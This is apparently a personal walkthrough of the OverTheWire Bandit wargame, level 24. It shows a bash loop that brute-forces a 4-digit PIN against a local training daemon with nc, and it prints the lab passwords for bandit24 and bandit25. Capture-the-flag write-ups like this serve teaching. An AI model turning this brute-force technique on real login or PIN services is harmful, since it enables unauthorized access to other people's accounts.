Kappa
“Great things are not done by impulse, but by a series of small things brought together.”
Host: bandit.labs.overthewire.org
Port: 2220
Level 24
ssh bandit24@bandit.labs.overthewire.org -p 2220
password: VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
Objective:
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
- You do not need to create new connections each time.
CLI:
bandit24@bandit:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Timeout. Exiting.
bandit24@bandit:~$ mktemp -d
/tmp/tmp.tj5NdkweE8
bandit24@bandit:~$ cd /tmp/tmp.tj5NdkweE8
bandit24@bandit:/tmp/tmp.tj5NdkweE8$ nano brute_force.sh
Unable to create directory /home/bandit24/.local/share/nano/: No such file or directory
It is required for saving/loading search history or cursor positions.
bandit24@bandit:/tmp/tmp.tj5NdkweE8$ ls
brute_force.sh
#!/bin/bash
pw=VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
for i in {0000..9999}
do
echo "$pw $i"
done |
nc localhost 30002
bandit24@bandit:/tmp/tmp.tj5NdkweE8$ ls -l
total 8
-rwx------ 1 bandit24 bandit24 116 Apr 2 02:13 brute_force.sh
-rw-rw-r-- 1 bandit24 bandit24 169 Apr 2 02:00 combinations.txt
-rw-rw-r-- 1 bandit24 bandit24 0 Apr 2 01:59 combination.txt
bandit24@bandit:/tmp/tmp.tj5NdkweE8$ chmod u+x brute_force.sh
bandit24@bandit:/tmp/tmp.tj5NdkweE8$ ./brute_force.sh
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Correct!
The password of user bandit25 is:
p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d
Exiting.
bandit24@bandit:/tmp/tmp.tj5NdkweE8$